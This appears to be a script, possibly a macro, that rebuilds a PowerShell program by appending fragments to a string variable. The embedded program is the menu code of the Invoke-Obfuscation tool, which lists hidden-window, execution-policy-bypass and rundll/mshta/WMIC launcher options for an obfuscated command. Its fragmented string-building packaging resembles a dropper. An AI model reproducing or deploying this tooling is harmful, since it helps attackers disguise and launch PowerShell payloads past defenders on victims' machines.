Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '2"
Ouzw = Ouzw + "'))
$MenuLevel_Launcher_CMD += , @($Li"
Ouzw = Ouzw + "neSpacing, '4' , '-NoProfile' "
Ouzw = Ouzw + " , @('Out-PowerShellLa"
Ouzw = Ouzw + "uncher', '', '2'))
$MenuLevel_Launcher_CMD "
Ouzw = Ouzw + " += , @($LineSpacing, '5' , '-Command' "
Ouzw = Ouzw + " , @('O"
Ouzw = Ouzw + "ut-PowerShellLauncher', '', '2'))
$MenuLevel_L"
Ouzw = Ouzw + "auncher_CMD += , @($LineSpacing, '6' , '-W"
Ouzw = Ouzw + "indowStyle Hidden' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '2'))
"
Ouzw = Ouzw + " $MenuLevel_Launcher_CMD += , @($LineSpa"
Ouzw = Ouzw + "cing, '7' , '-ExecutionPolicy Bypass' "
Ouzw = Ouzw + " , @('Out-PowerShellLaunche"
Ouzw = Ouzw + "r', '', '2'))
$MenuLevel_Launcher_CMD "
Ouzw = Ouzw + "+= , @($LineSpacing, '8' , '-Wow64 (to path 32-bit"
Ouzw = Ouzw + " powershell.exe)' , @('Out-Po"
Ouzw = Ouzw + "werShellLauncher', '', '2'))
$MenuLevel_Launc"
Ouzw = Ouzw + "her_WMIC = @()
$MenuLevel_Launcher_W"
Ouzw = Ouzw + "MIC += , @("Enter string of numbers with al"
Ouzw = Ouzw + "l desired flags to pass to function. (e.g. 23459)`"
Ouzw = Ouzw + "n", '' , '' , @('', '', ''))
$MenuLevel_Lau"
Ouzw = Ouzw + "ncher_WMIC += , @($LineSpacing, '0' , 'NO E"
Ouzw = Ouzw + "XECUTION FLAGS' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '3'))
"
Ouzw = Ouzw + " $MenuLevel_Launcher_WMIC += , @($LineSpaci"
Ouzw = Ouzw + "ng, '1' , '-NoExit' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher'"
Ouzw = Ouzw + ", '', '3'))
$MenuLevel_Launcher_WMIC +="
Ouzw = Ouzw + " , @($LineSpacing, '2' , '-NonInteractive' "
Ouzw = Ouzw + " , @('Out-Powe"
Ouzw = Ouzw + "rShellLauncher', '', '3'))
$MenuLevel_Launcher"
Ouzw = Ouzw + "_WMIC += , @($LineSpacing, '3' , '-NoLogo' "
Ouzw = Ouzw + " "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '3'))
$Men"
Ouzw = Ouzw + "uLevel_Launcher_WMIC += , @($LineSpacing, '"
Ouzw = Ouzw + "4' , '-NoProfile' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '',"
Ouzw = Ouzw + " '3'))
$MenuLevel_Launcher_WMIC += , @("
Ouzw = Ouzw + "$LineSpacing, '5' , '-Command' "
Ouzw = Ouzw + " , @('Out-PowerShel"
Ouzw = Ouzw + "lLauncher', '', '3'))
$MenuLevel_Launcher_WMIC"
Ouzw = Ouzw + " += , @($LineSpacing, '6' , '-WindowStyle H"
Ouzw = Ouzw + "idden' , @"
Ouzw = Ouzw + "('Out-PowerShellLauncher', '', '3'))
$MenuLeve"
Ouzw = Ouzw + "l_Launcher_WMIC += , @($LineSpacing, '7' , "
Ouzw = Ouzw + "'-ExecutionPolicy Bypass' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '3')"
Ouzw = Ouzw + ")
$MenuLevel_Launcher_WMIC += , @($Line"
Ouzw = Ouzw + "Spacing, '8' , '-Wow64 (to path 32-bit powershell."
Ouzw = Ouzw + "exe)' , @('Out-PowerShellLaun"
Ouzw = Ouzw + "cher', '', '3'))
$MenuLevel_Launcher_RUNDLL "
Ouzw = Ouzw + " = @()
$MenuLevel_Launcher_RUNDLL +"
Ouzw = Ouzw + "= , @("Enter string of numbers with all desired fl"
Ouzw = Ouzw + "ags to pass to function. (e.g. 23459)`n", '' , ''"
Ouzw = Ouzw + " , @('', '', ''))
$MenuLevel_Launcher_RUNDLL"
Ouzw = Ouzw + " += , @($LineSpacing, '0' , 'NO EXECUTION FLA"
Ouzw = Ouzw + "GS' , @('"
Ouzw = Ouzw + "Out-PowerShellLauncher', '', '4'))
$MenuLevel_"
Ouzw = Ouzw + "Launcher_RUNDLL += , @($LineSpacing, '1' , '-"
Ouzw = Ouzw + "NoExit' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '4'))
"
Ouzw = Ouzw + " $MenuLevel_Launcher_RUNDLL += , @($LineSp"
Ouzw = Ouzw + "acing, '2' , '-NonInteractive' "
Ouzw = Ouzw + " , @('Out-PowerShellLaunch"
Ouzw = Ouzw + "er', '', '4'))
$MenuLevel_Launcher_RUNDLL "
Ouzw = Ouzw + " += , @($LineSpacing, '3' , '-NoLogo' "
Ouzw = Ouzw + " , @('Out-P"
Ouzw = Ouzw + "owerShellLauncher', '', '4'))
$MenuLevel_Launc"
Ouzw = Ouzw + "her_RUNDLL += , @($LineSpacing, '4' , '-NoPro"
Ouzw = Ouzw + "file' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '4'))
$"
Ouzw = Ouzw + "MenuLevel_Launcher_RUNDLL += , @($LineSpacing"
Ouzw = Ouzw + ", '5' , '-Command' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', "
Ouzw = Ouzw + "'', '4'))
$MenuLevel_Launcher_RUNDLL += ,"
Ouzw = Ouzw + " @($LineSpacing, '6' , '-WindowStyle Hidden' "
Ouzw = Ouzw + " , @('Out-PowerS"
Ouzw = Ouzw + "hellLauncher', '', '4'))
$MenuLevel_Launcher_R"
Ouzw = Ouzw + "UNDLL += , @($LineSpacing, '7' , '-ExecutionP"
Ouzw = Ouzw + "olicy Bypass' "
Ouzw = Ouzw + ", @('Out-PowerShellLauncher', '', '4'))
$MenuL"
Ouzw = Ouzw + "evel_Launcher_RUNDLL += , @($LineSpacing, '8'"
Ouzw = Ouzw + " , '-Wow64 (to path 32-bit powershell.exe)' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '"
Ouzw = Ouzw + "4'))
${MenuLevel_Launcher_VAR+} = @()"
Ouzw = Ouzw + "
${MenuLevel_Launcher_VAR+} += , @("Enter"
Ouzw = Ouzw + " string of numbers with all desired flags to pass "
Ouzw = Ouzw + "to function. (e.g. 23459)`n", '' , '' , @('', '"
Ouzw = Ouzw + "', ''))
${MenuLevel_Launcher_VAR+} += , @"
Ouzw = Ouzw + "($LineSpacing, '0' , 'NO EXECUTION FLAGS' "
Ouzw = Ouzw + " , @('Out-PowerShe"
Ouzw = Ouzw + "llLauncher', '', '5'))
${MenuLevel_Launcher_VA"
Ouzw = Ouzw + "R+} += , @($LineSpacing, '1' , '-NoExit' "
Ouzw = Ouzw + " , "
Ouzw = Ouzw + "@('Out-PowerShellLauncher', '', '5'))
${MenuLe"
Ouzw = Ouzw + "vel_Launcher_VAR+} += , @($LineSpacing, '2' ,"
Ouzw = Ouzw + " '-NonInteractive' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '5'"
Ouzw = Ouzw + "))
${MenuLevel_Launcher_VAR+} += , @($Lin"
Ouzw = Ouzw + "eSpacing, '3' , '-NoLogo' "
Ouzw = Ouzw + " , @('Out-PowerShellLau"
Ouzw = Ouzw + "ncher', '', '5'))
${MenuLevel_Launcher_VAR+} "
Ouzw = Ouzw + " += , @($LineSpacing, '4' , '-NoProfile' "
Ouzw = Ouzw + " , @('Ou"
Ouzw = Ouzw + "t-PowerShellLauncher', '', '5'))
${MenuLevel_L"
Ouzw = Ouzw + "auncher_VAR+} += , @($LineSpacing, '5' , '-Co"
Ouzw = Ouzw + "mmand' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '5'))
"
Ouzw = Ouzw + " ${MenuLevel_Launcher_VAR+} += , @($LineSpac"
Ouzw = Ouzw + "ing, '6' , '-WindowStyle Hidden' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher"
Ouzw = Ouzw + "', '', '5'))
${MenuLevel_Launcher_VAR+} +"
Ouzw = Ouzw + "= , @($LineSpacing, '7' , '-ExecutionPolicy Bypass"
Ouzw = Ouzw + "' , @('Out-Pow"
Ouzw = Ouzw + "erShellLauncher', '', '5'))
${MenuLevel_Launch"
Ouzw = Ouzw + "er_VAR+} += , @($LineSpacing, '8' , '-Wow64 ("
Ouzw = Ouzw + "to path 32-bit powershell.exe)' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '5'))
${"
Ouzw = Ouzw + "MenuLevel_Launcher_STDIN+} = @()
${MenuL"
Ouzw = Ouzw + "evel_Launcher_STDIN+} += , @("Enter string of n"
Ouzw = Ouzw + "umbers with all desired flags to pass to function."
Ouzw = Ouzw + " (e.g. 23459)`n", '' , '' , @('', '', ''))
"
Ouzw = Ouzw + "${MenuLevel_Launcher_STDIN+} += , @($LineSpacin"
Ouzw = Ouzw + "g, '0' , 'NO EXECUTION FLAGS' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher',"
Ouzw = Ouzw + " '', '6'))
${MenuLevel_Launcher_STDIN+} += "
Ouzw = Ouzw + ", @($LineSpacing, '1' , '-NoExit' "
Ouzw = Ouzw + " , @('Out-Power"
Ouzw = Ouzw + "ShellLauncher', '', '6'))
${MenuLevel_Launcher"
Ouzw = Ouzw + "_STDIN+} += , @($LineSpacing, '2' , '-NonIntera"
Ouzw = Ouzw + "ctive' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '6'))
${Men"
Ouzw = Ouzw + "uLevel_Launcher_STDIN+} += , @($LineSpacing, '3"
Ouzw = Ouzw + "' , '-NoLogo' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', "
Ouzw = Ouzw + "'6'))
${MenuLevel_Launcher_STDIN+} += , @($"
Ouzw = Ouzw + "LineSpacing, '4' , '-NoProfile' "
Ouzw = Ouzw + " , @('Out-PowerShell"
Ouzw = Ouzw + "Launcher', '', '6'))
${MenuLevel_Launcher_STDI"
Ouzw = Ouzw + "N+} += , @($LineSpacing, '5' , '-Command' "
Ouzw = Ouzw + " , @("
Ouzw = Ouzw + "'Out-PowerShellLauncher', '', '6'))
${MenuLeve"
Ouzw = Ouzw + "l_Launcher_STDIN+} += , @($LineSpacing, '6' , '"
Ouzw = Ouzw + "-WindowStyle Hidden' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '6'))"
Ouzw = Ouzw + "
${MenuLevel_Launcher_STDIN+} += , @($LineS"
Ouzw = Ouzw + "pacing, '7' , '-ExecutionPolicy Bypass' "
Ouzw = Ouzw + " , @('Out-PowerShellLaunc"
Ouzw = Ouzw + "her', '', '6'))
${MenuLevel_Launcher_STDIN+} "
Ouzw = Ouzw + " += , @($LineSpacing, '8' , '-Wow64 (to path 32-b"
Ouzw = Ouzw + "it powershell.exe)' , @('Out-"
Ouzw = Ouzw + "PowerShellLauncher', '', '6'))
${MenuLeve"
Ouzw = Ouzw + "l_Launcher_CLIP+} = @()
${MenuLevel_Lau"
Ouzw = Ouzw + "ncher_CLIP+} += , @("Enter string of numbers w"
Ouzw = Ouzw + "ith all desired flags to pass to function. (e.g. 2"
Ouzw = Ouzw + "3459)`n", '' , '' , @('', '', ''))
${MenuLe"
Ouzw = Ouzw + "vel_Launcher_CLIP+} += , @($LineSpacing, '0' ,"
Ouzw = Ouzw + " 'NO EXECUTION FLAGS' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '7'"
Ouzw = Ouzw + "))
${MenuLevel_Launcher_CLIP+} += , @($Lin"
Ouzw = Ouzw + "eSpacing, '1' , '-NoExit' "
Ouzw = Ouzw + " , @('Out-PowerShellLau"
Ouzw = Ouzw + "ncher', '', '7'))
${MenuLevel_Launcher_CLIP+} "
Ouzw = Ouzw + " += , @($LineSpacing, '2' , '-NonInteractive' "
Ouzw = Ouzw + " , @('Ou"
Ouzw = Ouzw + "t-PowerShellLauncher', '', '7'))
${MenuLevel_L"
Ouzw = Ouzw + "auncher_CLIP+} += , @($LineSpacing, '3' , '-No"
Ouzw = Ouzw + "Logo' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '7'))
"
Ouzw = Ouzw + " ${MenuLevel_Launcher_CLIP+} += , @($LineSpac"
Ouzw = Ouzw + "ing, '4' , '-NoProfile' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher"
Ouzw = Ouzw + "', '', '7'))
${MenuLevel_Launcher_CLIP+} +"
Ouzw = Ouzw + "= , @($LineSpacing, '5' , '-Command' "
Ouzw = Ouzw + " , @('Out-Pow"
Ouzw = Ouzw + "erShellLauncher', '', '7'))
${MenuLevel_Launch"
Ouzw = Ouzw + "er_CLIP+} += , @($LineSpacing, '6' , '-WindowS"
Ouzw = Ouzw + "tyle Hidden' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '7'))
${M"
Ouzw = Ouzw + "enuLevel_Launcher_CLIP+} += , @($LineSpacing, "
Ouzw = Ouzw + "'7' , '-ExecutionPolicy Bypass' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', ''"
Ouzw = Ouzw + ", '7'))
${MenuLevel_Launcher_CLIP+} += , @"
Ouzw = Ouzw + "($LineSpacing, '8' , '-Wow64 (to path 32-bit power"
Ouzw = Ouzw + "shell.exe)' , @('Out-PowerShe"
Ouzw = Ouzw + "llLauncher', '', '7'))
${MenuLevel_Launch"
Ouzw = Ouzw + "er_VAR++} = @()
${MenuLevel_Launcher_VA"
Ouzw = Ouzw + "R++} += , @("Enter string of numbers with all "
Ouzw = Ouzw + "desired flags to pass to function. (e.g. 23459)`n""
Ouzw = Ouzw + ", '' , '' , @('', '', ''))
${MenuLevel_Laun"
Ouzw = Ouzw + "cher_VAR++} += , @($LineSpacing, '0' , 'NO EXE"
Ouzw = Ouzw + "CUTION FLAGS' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '8'))
$"
Ouzw = Ouzw + "{MenuLevel_Launcher_VAR++} += , @($LineSpacing"
Ouzw = Ouzw + ", '1' , '-NoExit' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', "
Ouzw = Ouzw + "'', '8'))
${MenuLevel_Launcher_VAR++} += ,"
Ouzw = Ouzw + " @($LineSpacing, '2' , '-NonInteractive' "
Ouzw = Ouzw + " , @('Out-PowerS"
Ouzw = Ouzw + "hellLauncher', '', '8'))
${MenuLevel_Launcher_"
Ouzw = Ouzw + "VAR++} += , @($LineSpacing, '3' , '-NoLogo' "
Ouzw = Ouzw + " "
Ouzw = Ouzw + ", @('Out-PowerShellLauncher', '', '8'))
${Menu"
Ouzw = Ouzw + "Level_Launcher_VAR++} += , @($LineSpacing, '4'"
Ouzw = Ouzw + " , '-NoProfile' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '"
Ouzw = Ouzw + "8'))
${MenuLevel_Launcher_VAR++} += , @($L"
Ouzw = Ouzw + "ineSpacing, '5' , '-Command' "
Ouzw = Ouzw + " , @('Out-PowerShellL"
Ouzw = Ouzw + "auncher', '', '8'))
${MenuLevel_Launcher_VAR++"
Ouzw = Ouzw + "} += , @($LineSpacing, '6' , '-WindowStyle Hid"
Ouzw = Ouzw + "den' , @('"
Ouzw = Ouzw + "Out-PowerShellLauncher', '', '8'))
${MenuLevel"
Ouzw = Ouzw + "_Launcher_VAR++} += , @($LineSpacing, '7' , '-"
Ouzw = Ouzw + "ExecutionPolicy Bypass' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '8'))
"
Ouzw = Ouzw + " ${MenuLevel_Launcher_VAR++} += , @($LineSp"
Ouzw = Ouzw + "acing, '8' , '-Wow64 (to path 32-bit powershell.ex"
Ouzw = Ouzw + "e)' , @('Out-PowerShellLaunch"
Ouzw = Ouzw + "er', '', '8'))
${MenuLevel_Launcher_STDIN++} "
Ouzw = Ouzw + " = @()
${MenuLevel_Launcher_STDIN++} += "
Ouzw = Ouzw + ", @("Enter string of numbers with all desired flag"
Ouzw = Ouzw + "s to pass to function. (e.g. 23459)`n", '' , '' "
Ouzw = Ouzw + " , @('', '', ''))
${MenuLevel_Launcher_STDIN++"
Ouzw = Ouzw + "} += , @($LineSpacing, '0' , "`tNO EXECUTION FLA"
Ouzw = Ouzw + "GS" , @('Ou"
Ouzw = Ouzw + "t-PowerShellLauncher', '', '9'))
${MenuLevel_L"
Ouzw = Ouzw + "auncher_STDIN++} += , @($LineSpacing, '1' , "`t-"
Ouzw = Ouzw + "NoExit" "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '9'))
"
Ouzw = Ouzw + " ${MenuLevel_Launcher_STDIN++} += , @($LineSpac"
Ouzw = Ouzw + "ing, '2' , "`t-NonInteractive" "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher"
Ouzw = Ouzw + "', '', '9'))
${MenuLevel_Launcher_STDIN++} +"
Ouzw = Ouzw + "= , @($LineSpacing, '3' , "`t-NoLogo" "
Ouzw = Ouzw + " , @('Out-Pow"
Ouzw = Ouzw + "erShellLauncher', '', '9'))
${MenuLevel_Launch"
Ouzw = Ouzw + "er_STDIN++} += , @($LineSpacing, '4' , "`t-NoPro"
Ouzw = Ouzw + "file" "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '9'))
${M"
Ouzw = Ouzw + "enuLevel_Launcher_STDIN++} += , @($LineSpacing, "
Ouzw = Ouzw + "'5' , "`t-Command" "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', ''"
Ouzw = Ouzw + ", '9'))
${MenuLevel_Launcher_STDIN++} += , @"
Ouzw = Ouzw + "($LineSpacing, '6' , "`t-WindowStyle Hidden" "
Ouzw = Ouzw + " , @('Out-PowerShe"
Ouzw = Ouzw + "llLauncher', '', '9'))
${MenuLevel_Launcher_ST"
Ouzw = Ouzw + "DIN++} += , @($LineSpacing, '7' , "`t-ExecutionP"
Ouzw = Ouzw + "olicy Bypass" , "
Ouzw = Ouzw + "@('Out-PowerShellLauncher', '', '9'))
${MenuLe"
Ouzw = Ouzw + "vel_Launcher_STDIN++} += , @($LineSpacing, '8' ,"
Ouzw = Ouzw + " "`t-Wow64 (to path 32-bit powershell.exe)" "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '9'"
Ouzw = Ouzw + "))
${MenuLevel_Launcher_CLIP++} = @()
"
Ouzw = Ouzw + " ${MenuLevel_Launcher_CLIP++} += , @("Enter s"
Ouzw = Ouzw + "tring of numbers with all desired flags to pass to"
Ouzw = Ouzw + " function. (e.g. 23459)`n", '' , '' , @('', '',"
Ouzw = Ouzw + " ''))
${MenuLevel_Launcher_CLIP++} += , @($"
Ouzw = Ouzw + "LineSpacing, '0' , 'NO EXECUTION FLAGS' "
Ouzw = Ouzw + " , @('Out-PowerShell"
Ouzw = Ouzw + "Launcher', '', '10'))
${MenuLevel_Launcher_CLI"
Ouzw = Ouzw + "P++} += , @($LineSpacing, '1' , '-NoExit' "
Ouzw = Ouzw + " , @"
Ouzw = Ouzw + "('Out-PowerShellLauncher', '', '10'))
${MenuLe"
Ouzw = Ouzw + "vel_Launcher_CLIP++} += , @($LineSpacing, '2' ,"
Ouzw = Ouzw + " '-NonInteractive' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '10"
Ouzw = Ouzw + "'))
${MenuLevel_Launcher_CLIP++} += , @($Li"
Ouzw = Ouzw + "neSpacing, '3' , '-NoLogo' "
Ouzw = Ouzw + " , @('Out-PowerShellLa"
Ouzw = Ouzw + "uncher', '', '10'))
${MenuLevel_Launcher_CLIP+"
Ouzw = Ouzw + "+} += , @($LineSpacing, '4' , '-NoProfile' "
Ouzw = Ouzw + " , @('"
Ouzw = Ouzw + "Out-PowerShellLauncher', '', '10'))
${MenuLeve"
Ouzw = Ouzw + "l_Launcher_CLIP++} += , @($LineSpacing, '5' , '"
Ouzw = Ouzw + "-Command' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '10')"
Ouzw = Ouzw + ")
${MenuLevel_Launcher_CLIP++} += , @($Line"
Ouzw = Ouzw + "Spacing, '6' , '-WindowStyle Hidden' "
Ouzw = Ouzw + " , @('Out-PowerShellLaun"
Ouzw = Ouzw + "cher', '', '10'))
${MenuLevel_Launcher_CLIP++}"
Ouzw = Ouzw + " += , @($LineSpacing, '7' , '-ExecutionPolicy B"
Ouzw = Ouzw + "ypass' , @('Ou"
Ouzw = Ouzw + "t-PowerShellLauncher', '', '10'))
${MenuLevel_"
Ouzw = Ouzw + "Launcher_CLIP++} += , @($LineSpacing, '8' , '-W"
Ouzw = Ouzw + "ow64 (to path 32-bit powershell.exe)' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '10'))
"
Ouzw = Ouzw + "
${MenuLevel_Launcher_RUNDLL++} = @()
"
Ouzw = Ouzw + "${MenuLevel_Launcher_RUNDLL++} += , @("Enter stri"
Ouzw = Ouzw + "ng of numbers with all desired flags to pass to fu"
Ouzw = Ouzw + "nction. (e.g. 23459)`n", '' , '' , @('', '', ''"
Ouzw = Ouzw + "))
${MenuLevel_Launcher_RUNDLL++} += , @($Lin"
Ouzw = Ouzw + "eSpacing, '0' , 'NO EXECUTION FLAGS' "
Ouzw = Ouzw + " , @('Out-PowerShellLau"
Ouzw = Ouzw + "ncher', '', '11'))
${MenuLevel_Launcher_RUNDLL"
Ouzw = Ouzw + "++} += , @($LineSpacing, '1' , '-NoExit' "
Ouzw = Ouzw + " , @('O"
Ouzw = Ouzw + "ut-PowerShellLauncher', '', '11'))
${MenuLevel"
Ouzw = Ouzw + "_Launcher_RUNDLL++} += , @($LineSpacing, '2' , '-"
Ouzw = Ouzw + "NonInteractive' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '11'))"
Ouzw = Ouzw + "
${MenuLevel_Launcher_RUNDLL++} += , @($LineS"
Ouzw = Ouzw + "pacing, '3' , '-NoLogo' "
Ouzw = Ouzw + " , @('Out-PowerShellLaunc"
Ouzw = Ouzw + "her', '', '11'))
${MenuLevel_Launcher_RUNDLL++"
Ouzw = Ouzw + "} += , @($LineSpacing, '4' , '-NoProfile' "
Ouzw = Ouzw + " , @('Out"
Ouzw = Ouzw + "-PowerShellLauncher', '', '11'))
${MenuLevel_L"
Ouzw = Ouzw + "auncher_RUNDLL++} += , @($LineSpacing, '5' , '-Co"
Ouzw = Ouzw + "mmand' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '11'))
"
Ouzw = Ouzw + " ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpa"
Ouzw = Ouzw + "cing, '6' , '-WindowStyle Hidden' "
Ouzw = Ouzw + " , @('Out-PowerShellLaunche"
Ouzw = Ouzw + "r', '', '11'))
${MenuLevel_Launcher_RUNDLL++} "
Ouzw = Ouzw + " += , @($LineSpacing, '7' , '-ExecutionPolicy Bypa"
Ouzw = Ouzw + "ss' , @('Out-P"
Ouzw = Ouzw + "owerShellLauncher', '', '11'))
${MenuLevel_Lau"
Ouzw = Ouzw + "ncher_RUNDLL++} += , @($LineSpacing, '8' , '-Wow6"
Ouzw = Ouzw + "4 (to path 32-bit powershell.exe)' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '11'))
"
Ouzw = Ouzw + " ${MenuLevel_Launcher_MSHTA++} = @()
${M"
Ouzw = Ouzw + "enuLevel_Launcher_MSHTA++} += , @("Enter string "
Ouzw = Ouzw + "of numbers with all desired flags to pass to funct"
Ouzw = Ouzw + "ion. (e.g. 23459)`n", '' , '' , @('', '', ''))
"
Ouzw = Ouzw + " ${MenuLevel_Launcher_MSHTA++} += , @($LineSp"
Ouzw = Ouzw + "acing, '0' , 'NO EXECUTION FLAGS' "
Ouzw = Ouzw + " , @('Out-PowerShellLaunch"
Ouzw = Ouzw + "er', '', '12'))
${MenuLevel_Launcher_MSHTA++} "
Ouzw = Ouzw + " += , @($LineSpacing, '1' , '-NoExit' "
Ouzw = Ouzw + " , @('Out-"
Ouzw = Ouzw + "PowerShellLauncher', '', '12'))
${MenuLevel_La"
Ouzw = Ouzw + "uncher_MSHTA++} += , @($LineSpacing, '2' , '-Non"
Ouzw = Ouzw + "Interactive' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '12'))
"
Ouzw = Ouzw + " ${MenuLevel_Launcher_MSHTA++} += , @($LineSpac"
Ouzw = Ouzw + "ing, '3' , '-NoLogo' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher"
Ouzw = Ouzw + "', '', '12'))
${MenuLevel_Launcher_MSHTA++} "
Ouzw = Ouzw + "+= , @($LineSpacing, '4' , '-NoProfile' "
Ouzw = Ouzw + " , @('Out-Po"
Ouzw = Ouzw + "werShellLauncher', '', '12'))
${MenuLevel_Laun"
Ouzw = Ouzw + "cher_MSHTA++} += , @($LineSpacing, '5' , '-Comma"
Ouzw = Ouzw + "nd' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '12'))
"
Ouzw = Ouzw + "${MenuLevel_Launcher_MSHTA++} += , @($LineSpacin"
Ouzw = Ouzw + "g, '6' , '-WindowStyle Hidden' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher',"
Ouzw = Ouzw + " '', '12'))
${MenuLevel_Launcher_MSHTA++} +="
Ouzw = Ouzw + " , @($LineSpacing, '7' , '-ExecutionPolicy Bypass'"
Ouzw = Ouzw + " , @('Out-Powe"
Ouzw = Ouzw + "rShellLauncher', '', '12'))
${MenuLevel_Launch"
Ouzw = Ouzw + "er_MSHTA++} += , @($LineSpacing, '8' , '-Wow64 ("
Ouzw = Ouzw + "to path 32-bit powershell.exe)' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '12'))
#"
Ouzw = Ouzw + " Input options to display non-interactive menus or"
Ouzw = Ouzw + " perform actions.
$TutorialInputOptions "
Ouzw = Ouzw + " = @(@('tutorial') , ""
Ouzw = Ouzw + "<Tutorial> of how to use this tool `t " )
"
Ouzw = Ouzw + " $MenuInputOptionsShowHelp = @(@('help','ge"
Ouzw = Ouzw + "t-help','?','-?','/?','menu'), "Show this <Help> M"
Ouzw = Ouzw + "enu `t " )
$MenuInputOpti"
Ouzw = Ouzw + "onsShowOptions = @(@('show options','show','optio"
Ouzw = Ouzw + "ns') , "<Show options> for payload to obfusc"
Ouzw = Ouzw + "ate `t " )
$ClearScreenInputOptions = "
Ouzw = Ouzw + "@(@('clear','clear-host','cls') , "<Cle"
Ouzw = Ouzw + "ar> screen `t " )
"
Ouzw = Ouzw + "$CopyToClipboardInputOptions = @(@('copy','clip',"
Ouzw = Ouzw + "'clipboard') , "<Copy> ObfuscatedComma"
Ouzw = Ouzw + "nd to clipboard `t " )
$OutputToDiskInput"
Ouzw = Ouzw + "Options = @(@('out') "
Ouzw = Ouzw + " , "Write ObfuscatedCommand <Out> to disk "
Ouzw = Ouzw + " `t " )
$ExecutionInputOptions = @(@("
Ouzw = Ouzw + "'exec','execute','test','run') , "<Execute"
Ouzw = Ouzw + "> ObfuscatedCommand locally `t " )
$Res"
Ouzw = Ouzw + "etObfuscationInputOptions = @(@('reset') "
Ouzw = Ouzw + " , "<Reset> ALL obfuscation fo"
Ouzw = Ouzw + "r ObfuscatedCommand ")
$UndoObfuscationInputO"
Ouzw = Ouzw + "ptions = @(@('undo') "
Ouzw = Ouzw + " , "<Undo> LAST obfuscation for ObfuscatedComman"
Ouzw = Ouzw + "d ")
$BackCommandInputOptions = @(@('bac"
Ouzw = Ouzw + "k','cd ..') , "Go <Back> to"
Ouzw = Ouzw + " previous obfuscation menu `t " )
$ExitCom"
Ouzw = Ouzw + "mandInputOptions = @(@('quit','exit') "
Ouzw = Ouzw + " , "<Quit> Invoke-Obfuscation "
Ouzw = Ouzw + " `t " )
$HomeMenuInputOptions "
Ouzw = Ouzw + " = @(@('home','main') ,"
Ouzw = Ouzw + " "Return to <Home> Menu `t " "
Ouzw = Ouzw + ")
# For Version 1.0 ASCII art is not necessary"
Ouzw = Ouzw + ".
#$ShowAsciiArtInputOptions = @(@('ascii'"
Ouzw = Ouzw + ") , "Display random "
Ouzw = Ouzw + "<ASCII> art for the lulz :)`t")
# Add all"
Ouzw = Ouzw + " above input options lists to be displayed in SHOW"
Ouzw = Ouzw + " OPTIONS menu.
$AllAvailableInputOptionsLists "
Ouzw = Ouzw + " = @()
$AllAvailableInputOptionsLists += , $"
Ouzw = Ouzw + "TutorialInputOptions
$AllAvailableInputOptions"
Ouzw = Ouzw + "Lists += , $MenuInputOptionsShowHelp
$AllAvai"
Ouzw = Ouzw + "lableInputOptionsLists += , $MenuInputOptionsShow"
Ouzw = Ouzw + "Options
$AllAvailableInputOptionsLists += , $"
Ouzw = Ouzw + "ClearScreenInputOptions
$AllAvailableInputOpti"
Ouzw = Ouzw + "onsLists += , $ExecutionInputOptions
$AllAvai"
Ouzw = Ouzw + "lableInputOptionsLists += , $CopyToClipboardInput"
Ouzw = Ouzw + "Options
$AllAvailableInputOptionsLists += , $"
Ouzw = Ouzw + "OutputToDiskInputOptions
$AllAvailableInputOpt"
Ouzw = Ouzw + "ionsLists += , $ResetObfuscationInputOptions
"
Ouzw = Ouzw + "$AllAvailableInputOptionsLists += , $UndoObfuscat"
Ouzw = Ouzw + "ionInputOptions
$AllAvailableInputOptionsLists"
Ouzw = Ouzw + " += , $BackCommandInputOptions
$AllAvaila"
Ouzw = Ouzw + "bleInputOptionsLists += , $ExitCommandInputOption"
Ouzw = Ouzw + "s
$AllAvailableInputOptionsLists += , $HomeMe"
Ouzw = Ouzw + "nuInputOptions
# For Version 1.0 ASCII art is "
Ouzw = Ouzw + "not necessary.
#$AllAvailableInputOptionsLists"
Ouzw = Ouzw + " += , $ShowAsciiArtInputOptions
# Input opti"
Ouzw = Ouzw + "ons to change interactive menus.
